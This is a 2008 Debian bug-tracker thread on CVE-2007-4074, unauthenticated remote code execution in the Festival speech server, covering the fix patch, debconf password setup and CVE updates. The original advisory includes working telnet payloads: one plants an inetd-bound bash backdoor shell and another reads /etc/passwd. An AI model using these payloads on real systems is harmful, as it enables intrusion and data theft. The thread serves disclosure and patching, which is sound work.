Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-03-01 Thread Nico Golde 
Hi Tim,
* Tim Brown <[EMAIL PROTECTED]> [2008-03-01 16:19]:
> On Saturday 01 March 2008 14:44:01 Nico Golde wrote:
[...] 
> > Huh? "which allows local and remote attackers to execute
> > arbitrary commands"
[...] 
> I saw that, but assumed it would reference Debian in some manner.  After all 
> Debian distributions (and derivatives including Ubuntu hardy) are/were 
> exploitable.

Nope I don't think that will happen :/
Cheers
Nico
-- 
Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.


pgp2OlyDOcQkC.pgp
Description: PGP signature

Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-03-01 Thread Tim Brown 
On Saturday 01 March 2008 14:44:01 Nico Golde wrote:
> Hi Tim,
>
> * Tim Brown <[EMAIL PROTECTED]> [2008-03-01 15:28]:
> > On Tuesday 19 February 2008 20:12:29 Nico Golde wrote:
> > > > It
> > > > probably also needs rewording since SuSE confirmed it affected them
> > > > and I think we agree it affects Debian.  How do we go about doing
> > > > that - is that something for you guys or do I need to get involved?
> > >
> > > I see your point, I will contact mitre to update the CVE id
> > > or to assign a new one.
> >
> > No news from MITRE? At least their CVE entry doesn't appear to be
> > updated.
>
> Huh? "which allows local and remote attackers to execute
> arbitrary commands"
> Cheers
> Nico

I saw that, but assumed it would reference Debian in some manner.  After all 
Debian distributions (and derivatives including Ubuntu hardy) are/were 
exploitable.

Tim
-- 
Tim Brown





-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-03-01 Thread Nico Golde 
Hi Tim,
* Tim Brown <[EMAIL PROTECTED]> [2008-03-01 15:28]:
> On Tuesday 19 February 2008 20:12:29 Nico Golde wrote:
> 
> > > It
> > > probably also needs rewording since SuSE confirmed it affected them and I
> > > think we agree it affects Debian.  How do we go about doing that - is
> > > that something for you guys or do I need to get involved?
> >
> > I see your point, I will contact mitre to update the CVE id
> > or to assign a new one.
> 
> No news from MITRE? At least their CVE entry doesn't appear to be updated.

Huh? "which allows local and remote attackers to execute 
arbitrary commands"
Cheers
Nico

-- 
Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.


pgpINicRJVpAF.pgp
Description: PGP signature

Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-03-01 Thread Tim Brown 
On Tuesday 19 February 2008 20:12:29 Nico Golde wrote:

> > It
> > probably also needs rewording since SuSE confirmed it affected them and I
> > think we agree it affects Debian.  How do we go about doing that - is
> > that something for you guys or do I need to get involved?
>
> I see your point, I will contact mitre to update the CVE id
> or to assign a new one.

No news from MITRE? At least their CVE entry doesn't appear to be updated.

> I guess they will happily release a DSA if someone comes up
> and provides a fixed stable package that just works.

I've attached a patch that I think resolves this issue on stable - no 
warranties.  Just wanted to make this final email as I'm intending to release 
my advisory shortly subject to any updates here.

Tim
-- 
Tim Brown


diff -rN festival-1.4.3/debian/changelog festival-1.4.3-new/debian/changelog
0a1,18
> festival (1.4.3-17.3) unstable; urgency=high
> 
>   * Fix root security hole. Thanks to Tim Brown.
> + debian/festival.init: Read festival.scm upon start.
>   (Closes: #466146)
>   * debian/festival.scm:
> + Add sane default values for server. The festival
>   init script now uses these values while starting the
>   server.
>   * debian/README.Debian:
> + Document some changes on daemon mode.
>   * debian/templates, debian/config, debian/festival.postinst:
> + Ask for server password during install.
>   * debian/lintian-override:
> + Permission of /etc/festival.scm should be 0600.
> 
>  -- Tim Brown <[EMAIL PROTECTED]>  Sat, 01 Mar 2008 12:40:33 +
> 
diff -rN festival-1.4.3/debian/config festival-1.4.3-new/debian/config
0a1,20
> #!/bin/sh -e
> 
> # Source debconf library.
> . /usr/share/debconf/confmodule
> 
> # grab selected config values from the config file and store them
> # in debconf's database
> 
> # first grab existing value (keep config file's existing value)
> CONFIG_FILE=/etc/festival.scm
> 
> # to help security, let password be entered afresh each time
> # (and don't display the value left in the debconf database of
> # "password written to config file")
> db_set festival/server_passwd ""
> 
> db_input critical festival/server_passwd || true
> 
> db_go || true
> db_stop || true
diff -rN festival-1.4.3/debian/festival.init festival-1.4.3-new/debian/festival.init
27c27
< 		--exec $DAEMON -- --server
---
> 		--exec $DAEMON -- --server -b /etc/festival.scm
39c39
< 		--exec $DAEMON -- --server
---
> 		--exec $DAEMON -- --server -b /etc/festival.scm
diff -rN festival-1.4.3/debian/festival.postinst festival-1.4.3-new/debian/festival.postinst
0a1,50
> #!/bin/sh
> 
> set -e
> 
> . /usr/share/debconf/confmodule
> 
> # write selected values into config file
> CONFIG_FILE=/etc/festival.scm
> 
> PASSWD_ENTRY=server_passwd
> 
> PASSWD=your_festival_passwd
> db_get festival/server_passwd
> PASSWD="$RET"
> # insert the entry, if it is missing (which it ought not to be)
> grep -Eq "^[[:blank:]]*\(set![[:blank:]][[:blank:]]*$PASSWD_ENTRY[[:blank:]]" $CONFIG_FILE || \
> echo "(set! $PASSWD_ENTRY \"$PASSWD\")" >> $CONFIG_FILE
> 
> # only process the password if it is not empty
> if [ "$PASSWD" ]; then
> # copy config file here in order to preserve permissions when actually
> # building the tmp file in the sed step
> cp -a -f $CONFIG_FILE $CONFIG_FILE.tmp
> 
> # escape sed special characters
> #echo $PASSWD | sed -n 's|[\|\$\&\.\*\%\^\+\?]|\\&|g'
> PASSWD=$(echo $PASSWD | sed 's|[\[\(\)\|\$\&\.\*\%\^\+\?\/]|\\&|g')
> sed -e "s/(set.[[:blank:]]\+$PASSWD_ENTRY.*)/(set! $PASSWD_ENTRY \"$PASSWD\")/" \
> 	< $CONFIG_FILE > $CONFIG_FILE.tmp
> 
> mv -f $CONFIG_FILE.tmp $CONFIG_FILE
> # remove the password from the debconf database
> db_set festival/server_passwd "password written to config file"
> 
> fi
> 
> # extra safety check: ensure passwords in config file cannot be read by anyone
> chown nobody /etc/festival.scm
> chmod og-r $CONFIG_FILE
> 
> # Supporta log file
> mkdir -p /var/log/festival
> touch /var/log/festival/festival.log
> chown nobody:audio /var/log/festival/festival.log
> 
> # must indicate we are done with debconf, or the script will hang when the
> # server is started below (DEBHELPER section, via dh_installinit).
> db_stop
> 
> #DEBHELPER#
diff -rN festival-1.4.3/debian/festival.postrm festival-1.4.3-new/debian/festival.postrm
4a5,9
> if [ "$1" = "purge" ];then
> rm -rf /var/log/festival
> rm -f /etc/festival.scm
> fi
> 
diff -rN festival-1.4.3/debian/festival.scm festival-1.4.3-new/debian/festival.scm
3a4,23
> 
> ; Maximum number of clients on the server
> (set! server_max_clients 10)
> 
> ; Server port
> (set! server_port 1314)
> 
> ; Server password
> (set! server_passwd nil)
> 
> ; Log file location
> (set! server_log_file "/var/log/festival/festival.log")
> 
> ; Server access list (hosts)
> ; Example:
> ; (set! server_access_list '("[^.]+" "127.0.0.1" "localhost.*" "192.168.*"))
> ; Secure default:
> (s

Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-02-19 Thread Nico Golde 
Hi Tim,
* Tim Brown <[EMAIL PROTECTED]> [2008-02-19 20:57]:
> On Tuesday 19 February 2008 19:20:23 Nico Golde wrote:
> 
> > * Tim Brown <[EMAIL PROTECTED]> [2008-02-19 20:08]:
> > > I've just notice that the security tracker
> > > http://security-tracker.debian.net/tracker/status/release/unstable has
> > > been updated for festival.  However it is wrong.  This bug *is* remotely
> > > exploitable (due to the afore mentioned lack of ACLs).
> >
> > Sure it is :) The remote exploitability status isn't set
> > manually by us. This is extracted automatically from the NVD
> > text http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-4074 which
> > doesn't mention the word 'remote'. I think that's the
> > reason. Patches welcome :)
> 
> Okay, so the CVE entry is wrong (which probably explains why it wasn't 
> correctly resolved by the maintainers when it was first looked at).

Maybe it's also the Access Vector: string, not sure. Florian 
Weimer knows the details.

> It 
> probably also needs rewording since SuSE confirmed it affected them and I 
> think we agree it affects Debian.  How do we go about doing that - is that 
> something for you guys or do I need to get involved?

I see your point, I will contact mitre to update the CVE id 
or to assign a new one.

> Also, since we have a working patch for the issue on mentors what happens 
> now.  
> Can it go through as NMU?

The maintainer already uploaded a fixed version to unstable 
so no need for that. An NMU is only needed if the maintainer 
can't do an upload himself.

> What about the backport to stable and testing?

The package should migrate to testing in two days. If it has 
problems on migration we may do a testing security upload 
for this. For stable please contact. Referring to our svn 
the stable security did not release a DSA for CVE-2007-4074 
because it was a minor issue. If you think this should get 
fixed in stable please contact [EMAIL PROTECTED]

I guess they will happily release a DSA if someone comes up 
and provides a fixed stable package that just works.

If not, the maintainer still has a high chance to get this 
fixed via a regular point update. For this please contact 
the release team.

Kind regards
Nico

-- 
Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.


pgphOu1LUlfsj.pgp
Description: PGP signature

Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-02-19 Thread Tim Brown 
On Tuesday 19 February 2008 19:20:23 Nico Golde wrote:

> * Tim Brown <[EMAIL PROTECTED]> [2008-02-19 20:08]:
> > I've just notice that the security tracker
> > http://security-tracker.debian.net/tracker/status/release/unstable has
> > been updated for festival.  However it is wrong.  This bug *is* remotely
> > exploitable (due to the afore mentioned lack of ACLs).
>
> Sure it is :) The remote exploitability status isn't set
> manually by us. This is extracted automatically from the NVD
> text http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-4074 which
> doesn't mention the word 'remote'. I think that's the
> reason. Patches welcome :)

Okay, so the CVE entry is wrong (which probably explains why it wasn't 
correctly resolved by the maintainers when it was first looked at).  It 
probably also needs rewording since SuSE confirmed it affected them and I 
think we agree it affects Debian.  How do we go about doing that - is that 
something for you guys or do I need to get involved?

Also, since we have a working patch for the issue on mentors what happens now.  
Can it go through as NMU?  What about the backport to stable and testing?

Tim
-- 
Tim Brown





-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-02-19 Thread Nico Golde 
Hi Tim,
* Tim Brown <[EMAIL PROTECTED]> [2008-02-19 20:08]:
> I've just notice that the security tracker 
> http://security-tracker.debian.net/tracker/status/release/unstable has been 
> updated for festival.  However it is wrong.  This bug *is* remotely 
> exploitable (due to the afore mentioned lack of ACLs).

Sure it is :) The remote exploitability status isn't set 
manually by us. This is extracted automatically from the NVD 
text http://nvd.nist.gov/nvd.cfm?cvename=CVE-2007-4074 which 
doesn't mention the word 'remote'. I think that's the 
reason. Patches welcome :)

Kind regards
Nico
-- 
Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.


pgpCeDRwjixSc.pgp
Description: PGP signature

Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-02-19 Thread Tim Brown 
Nico,

I've just notice that the security tracker 
http://security-tracker.debian.net/tracker/status/release/unstable has been 
updated for festival.  However it is wrong.  This bug *is* remotely 
exploitable (due to the afore mentioned lack of ACLs).

Tim
-- 
Tim Brown





-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-02-19 Thread Tim Brown 

On Tue, 19 Feb 2008, Kumar Appaiah wrote:


On Tue, Feb 19, 2008 at 12:16:14PM +0100, Nico Golde wrote:

Hi Tim,
this is somehow strange, this CVE id was already fixed in
1.4.3-21 referring to the security tracker (see bug #435445
for reference).

Did this fix got lost somewhere in the package history?


It appears that the troublesome issue of running festival as a less
privileged user was handled in the last upload. However, what was not
handled was the restriction of accesss to localhost by default, and
the necessity to introduce a password for this purpose. The last
upload, which Tim has checked a few times, introduces this feature,
and thus, makes the security aspect a bit more complete.

Hope this is fine. Thanks for the follow up.


This is my impression too.  Gentoo introduced localhost restrictions in 
their patch for the original issue, in addition to changing the init 
process of the server so that it run under its own privileges rather than 
root- they didn't add authentication though.  The Debian patch only changed the 
init process of the server, which while preventing a full root compromise, 
did not prevent remote unauthenticated access.


Looking at the previous bug history there was some discussion about 
disabling the system command too, but IMO this does little to fix the 
underlying problem of an unauthenticated scheme interpreter bound to a 
remote port with no ACLs or authentication.


Tim
--
Tim Brown





--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-02-19 Thread Kumar Appaiah 
On Tue, Feb 19, 2008 at 12:16:14PM +0100, Nico Golde wrote:
> Hi Tim,
> this is somehow strange, this CVE id was already fixed in 
> 1.4.3-21 referring to the security tracker (see bug #435445 
> for reference).
> 
> Did this fix got lost somewhere in the package history?

Dear Nico,

It appears that the troublesome issue of running festival as a less
privileged user was handled in the last upload. However, what was not
handled was the restriction of accesss to localhost by default, and
the necessity to introduce a password for this purpose. The last
upload, which Tim has checked a few times, introduces this feature,
and thus, makes the security aspect a bit more complete.

Hope this is fine. Thanks for the follow up.

Kumar
-- 
Kumar Appaiah,
458, Jamuna Hostel,
Indian Institute of Technology Madras,
Chennai - 600 036


signature.asc
Description: Digital signature

Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-02-19 Thread Nico Golde 
Hi Tim,
this is somehow strange, this CVE id was already fixed in 
1.4.3-21 referring to the security tracker (see bug #435445 
for reference).

Did this fix got lost somewhere in the package history?
Kind regards
Nico
-- 
Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.


pgpCYdsqOEnbI.pgp
Description: PGP signature

Processed: Re: Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-02-19 Thread Debian Bug Tracking System 
Processing commands for [EMAIL PROTECTED]:

> retitle 466146 festival: CVE-2007-4074 default configuration allows 
> unauthenticated remote code execution
Bug#466146: festival: Default configuration allows unauthenticated remote code 
execution
Changed Bug title to `festival: CVE-2007-4074 default configuration allows 
unauthenticated remote code execution' from `festival: Default configuration 
allows unauthenticated remote code execution'.
(By the way, that Bug is currently marked as done.)

> thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-02-19 Thread Nico Golde 
retitle 466146 festival: CVE-2007-4074 default configuration allows 
unauthenticated remote code execution
thanks

Hi Tim,
* Tim Brown <[EMAIL PROTECTED]> [2008-02-17 04:18]:
> Package: festival
> Version: 1.96~beta-5
> Severity: critical
> Tags: security
> Justification: root security hole
> 
> Nth Dimension Security Advisory (NDSA20080215)
> Date: 15th February 2008
> Author: Tim Brown 
> URL:  / 
> Product: Festival 1.96:beta July 2004 
> 
> Vendor: Centre for Speech Technology Research, University of Edinburgh 
> 
> Risk: Medium
[...] 

CVE-2007-4074 was assigned to this issue.

==
Name: CVE-2007-4074
Status: Candidate
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4074
Reference: CONFIRM:http://bugs.gentoo.org/show_bug.cgi?id=170477
Reference: GENTOO:GLSA-200707-10
Reference: URL:http://security.gentoo.org/glsa/glsa-200707-10.xml
Reference: SUSE:SUSE-SR:2007:021
Reference: 
URL:http://lists.opensuse.org/opensuse-security-announce/2007-10/msg6.html
Reference: BID:25069
Reference: URL:http://www.securityfocus.com/bid/25069
Reference: SECUNIA:26229
Reference: URL:http://secunia.com/advisories/26229
Reference: SECUNIA:27271
Reference: URL:http://secunia.com/advisories/27271
Reference: XF:gentoo-festival-privilege-escalation(35606)
Reference: URL:http://xforce.iss.net/xforce/xfdb/35606

The default configuration of Centre for Speech Technology Research
(CSTR) Festival 1.95 beta (aka 2.0 beta) on Gentoo Linux is run
locally with elevated privileges without requiring authentication,
which allows context-dependent attackers to execute arbitrary commands
via the local daemon on port 1314, a different vulnerability than
CVE-2001-0956.

Kind regards
Nico
-- 
Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.


pgpUqhVlCUsyi.pgp
Description: PGP signature

Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-02-18 Thread Tim Brown 
On Monday 18 February 2008 07:42:06 Kumar Appaiah wrote:

> Dear Tim,
>
> Many thanks for the constant support. The package should now be all
> right with this change, available at the same location.

Not a problem - it seems to build cleanly now with no problems.  I guess it 
can be pushed to unstable and backported to stable security.

Tim
-- 
Tim Brown





-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-02-17 Thread Kumar Appaiah 
On 18/02/2008, Tim Brown wrote:
> > dget -x
> > http://mentors.debian.net/debian/pool/main/f/festival/festival_1.96~beta-6.
> >dsc
>
> Looks good apart from Lintian reporting:
>
> N:
> N:   chown user.group is called in one of the maintainer scripts. The
> N:   correct syntax is chown user:group. Using "." as a separator is still
> N:   supported by the GNU tools, but it will fail as soon as a system uses
> N:   the "." in user or group names.
> N:

Dear Tim,

Many thanks for the constant support. The package should now be all
right with this change, available at the same location.

dget -x 
http://mentors.debian.net/debian/pool/main/f/festival/festival_1.96~beta-6.

Thanks again!

Kumar
-- 
Kumar Appaiah,
458, Jamuna Hostel,
Indian Institute of Technology Madras,
Chennai - 600036



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-02-17 Thread Tim Brown 
On Monday 18 February 2008 01:40:00 Kumar Appaiah wrote:
> On Sun, Feb 17, 2008 at 05:32:44PM +, Tim Brown wrote:
> > I've just built it here.  It is lintian clean and the patch provides the
> > required security fix.  However 2 small points, 1) The logging doesn't
> > work as /var/log/festival isn't created (and owned by festival,audio) 2)
> > Passwords are displayed by debconf rather than hiding them with *'s.  I'm
> > only a fellow maintainer, but I'm sure your mentor can provide
> > appropriate feedback on these issues.
>
> First of all, many thanks for pointing out both these issues. I have
> solved both, and the fixed version is here:
>
> dget -x
> http://mentors.debian.net/debian/pool/main/f/festival/festival_1.96~beta-6.
>dsc

Looks good apart from Lintian reporting:

N:
N:   chown user.group is called in one of the maintainer scripts. The
N:   correct syntax is chown user:group. Using "." as a separator is still
N:   supported by the GNU tools, but it will fail as soon as a system uses
N:   the "." in user or group names.
N:

Tim
-- 
Tim Brown





-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-02-17 Thread Kumar Appaiah 
On Sun, Feb 17, 2008 at 05:32:44PM +, Tim Brown wrote:
> I've just built it here.  It is lintian clean and the patch provides the 
> required security fix.  However 2 small points, 1) The logging doesn't work 
> as /var/log/festival isn't created (and owned by festival,audio) 2)  
> Passwords are displayed by debconf rather than hiding them with *'s.  I'm 
> only a fellow maintainer, but I'm sure your mentor can provide appropriate 
> feedback on these issues.

First of all, many thanks for pointing out both these issues. I have
solved both, and the fixed version is here:

dget -x 
http://mentors.debian.net/debian/pool/main/f/festival/festival_1.96~beta-6.dsc


Further comments and feedback would be welcome.

Kumar
-- 
Kumar Appaiah,
458, Jamuna Hostel,
Indian Institute of Technology Madras,
Chennai - 600 036


signature.asc
Description: Digital signature

Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-02-17 Thread Tim Brown 
On Sunday 17 February 2008 16:23:37 Kumar Appaiah wrote:

> Please note that I now use debconf to ask for the password to be
> entered. I have tested that the system works fine, but as this is my
> first debconf experience, a quick review would be appreciated,
> followed by upload, as this is a security bug.

Another thought, the fix will require backporting to stable so that it can go 
into the security updates.

Tim
-- 
Tim Brown





-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-02-17 Thread Tim Brown 
On Sunday 17 February 2008 16:23:37 Kumar Appaiah wrote:

> dget -x
> http://mentors.debian.net/debian/pool/main/f/festival/festival_1.96~beta-6.
>dsc
>
> Please note that I now use debconf to ask for the password to be
> entered. I have tested that the system works fine, but as this is my
> first debconf experience, a quick review would be appreciated,
> followed by upload, as this is a security bug.

Kumar,

I've just built it here.  It is lintian clean and the patch provides the 
required security fix.  However 2 small points, 1) The logging doesn't work 
as /var/log/festival isn't created (and owned by festival,audio) 2)  
Passwords are displayed by debconf rather than hiding them with *'s.  I'm 
only a fellow maintainer, but I'm sure your mentor can provide appropriate 
feedback on these issues.

Cheers,
Tim
-- 
Tim Brown





-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Processed: Re: Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-02-17 Thread Debian Bug Tracking System 
Processing commands for [EMAIL PROTECTED]:

> tags 466146 pending
Bug#466146: festival: Default configuration allows unauthenticated remote code 
execution
Tags were: security
Tags added: pending

> thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-02-17 Thread Kumar Appaiah 
tags 466146 pending
thanks

On Sun, Feb 17, 2008 at 05:51:38AM +, Tim Brown wrote:
> Can I suggest that a password is set (perhaps take a look at the Debian MySQL 
> server package which does something similar for the debian-sys-maint in 
> the /etc/mysql/debian.cnf file).  Limiting access to local hosts is an 
> improvement, but as noted it does not guard against local privilege 
> escalation attacks.

I have now added this feature. A package is ready for testing at mentors:

dget -x 
http://mentors.debian.net/debian/pool/main/f/festival/festival_1.96~beta-6.dsc

Please note that I now use debconf to ask for the password to be
entered. I have tested that the system works fine, but as this is my
first debconf experience, a quick review would be appreciated,
followed by upload, as this is a security bug.

Thanks.

Kumar
-- 
Kumar Appaiah,
458, Jamuna Hostel,
Indian Institute of Technology Madras,
Chennai - 600 036


signature.asc
Description: Digital signature

Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-02-16 Thread Kumar Appaiah 
On Sun, Feb 17, 2008 at 05:51:38AM +, Tim Brown wrote:
> > A package is ready for upload at mentors. Thanks for the report. If,
> > after consulting my sponsor and some security people, I find that it
> > is OK, it shall be uploaded.
> 
> Kumar,
> 
> Can I suggest that a password is set (perhaps take a look at the Debian MySQL 
> server package which does something similar for the debian-sys-maint in 
> the /etc/mysql/debian.cnf file).  Limiting access to local hosts is an 
> improvement, but as noted it does not guard against local privilege 
> escalation attacks.

I shall make an attempt to arrange for this. Thank you for the
suggestion.

Kumar
-- 
Kumar Appaiah,
458, Jamuna Hostel,
Indian Institute of Technology Madras,
Chennai - 600 036


signature.asc
Description: Digital signature

Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-02-16 Thread Tim Brown 
On Sunday 17 February 2008 05:13:21 Kumar Appaiah wrote:
> tags 466146 pending
> thanks
>
> Hi!
>
> A package is ready for upload at mentors. Thanks for the report. If,
> after consulting my sponsor and some security people, I find that it
> is OK, it shall be uploaded.

Kumar,

Can I suggest that a password is set (perhaps take a look at the Debian MySQL 
server package which does something similar for the debian-sys-maint in 
the /etc/mysql/debian.cnf file).  Limiting access to local hosts is an 
improvement, but as noted it does not guard against local privilege 
escalation attacks.

Tim
-- 
Tim Brown





-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Processed: Re: Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-02-16 Thread Debian Bug Tracking System 
Processing commands for [EMAIL PROTECTED]:

> tags 466146 pending
Bug#466146: festival: Default configuration allows unauthenticated remote code 
execution
Tags were: security
Tags added: pending

> thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]

Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-02-16 Thread Kumar Appaiah 
tags 466146 pending
thanks

Hi!

A package is ready for upload at mentors. Thanks for the report. If,
after consulting my sponsor and some security people, I find that it
is OK, it shall be uploaded.

Thanks!

Kumar
-- 
Kumar Appaiah,
458, Jamuna Hostel,
Indian Institute of Technology Madras,
Chennai - 600 036


signature.asc
Description: Digital signature

Bug#466146: festival: Default configuration allows unauthenticated remote code execution

2008-02-16 Thread Tim Brown 
Package: festival
Version: 1.96~beta-5
Severity: critical
Tags: security
Justification: root security hole

Nth Dimension Security Advisory (NDSA20080215)
Date: 15th February 2008
Author: Tim Brown 
URL:  / 
Product: Festival 1.96:beta July 2004 

Vendor: Centre for Speech Technology Research, University of Edinburgh 

Risk: Medium

Summary

The Festival server is vulnerable to unauthenticated remote code execution.

Further research indicates that this vulnerability has already been reported
as a local privilege escalation against both the Gentoo and SuSE GNU/Linux 
distributions.  The remote form of this vulnerability was identified in
1.96~beta-5 as distributed in Debian unstable.

Technical Details

The Festival server which can be started using festival --server is vulnerable
to unauthenticated remote command execution due to the inclusion of a scheme
interpreter.  It is possible to make use of standard scheme functions in order
to execute further code, like so:

$ telnet 10.0.0.1 1314
Trying 10.0.0.1...
Connected to 10.0.0.1.
(system "echo ' stream tcp nowait festival /bin/bash /bin/bash -i' >
/tmp/backdoor.conf; /usr/sbin/inetd /tmp/backdoor.conf")

Connection closed by foreign host.

Whilst this is the most trivial way that the vulnerability can be exploited
the inclusion of a scheme interpreter available without authentication allows
for other vectors of attack.  Scheme functions such as SayText and tts (which
reads a file on the vulnerable system) pose particular interest, for example:

$ telnet 10.0.0.1 1314
Trying 10.0.0.1...
Connected to 10.0.0.1.
(tts "/etc/passwd" nil)

Whilst it is acknowledged that the inclusion of the scheme interpreter in this
manner is entirely intentional, the default unsecure state of the server could
be exploited particularly where the user is unaware of the servers existance.

Solutions

In order to completely protect against the vulnerability (in the short term),
Nth Dimension recommend turning off the server or filtering connections to the
affected port using a host based firewall.  The server itself can be secured by
applying the patches located at http://bugs.gentoo.org/show_bug.cgi?id=170477.
This includes applying a default configuration which limits access to localhost
and setting an optional password which prevents unauthenticated access.

-- System Information:
Debian Release: lenny/sid
  APT prefers oldstable
  APT policy: (500, 'oldstable'), (500, 'unstable'), (500, 'testing'), (500, 
'stable'), (1, 'experimental')
Architecture: i386 (i686)

Kernel: Linux 2.6.22-3-686 (SMP w/2 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash

Versions of packages festival depends on:
ii  adduser 3.105add and remove users and groups
ii  libaudiofile0   0.2.6-7  Open-source version of SGI's audio
ii  libc6   2.7-8GNU C Library: Shared libraries
ii  libesd0 0.2.36-3 Enlightened Sound Daemon - Shared 
ii  libestools1.2   1:1.2.96~beta-2  Edinburgh Speech Tools Library
ii  libgcc1 1:4.3-20080202-1 GCC support library
ii  libncurses5 5.6+20080203-1   Shared libraries for terminal hand
ii  libstdc++6  4.3-20080202-1   The GNU Standard C++ Library v3
ii  lsb-base3.1-24   Linux Standard Base 3.1 init scrip
ii  sgml-base   1.26 SGML infrastructure and SGML catal
ii  sysv-rc 2.86.ds1-53  System-V-like runlevel change mech

Versions of packages festival recommends:
ii  festvox-kallpc16k [festival-v 1.4.0-5American English male speaker for 

-- no debconf information



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]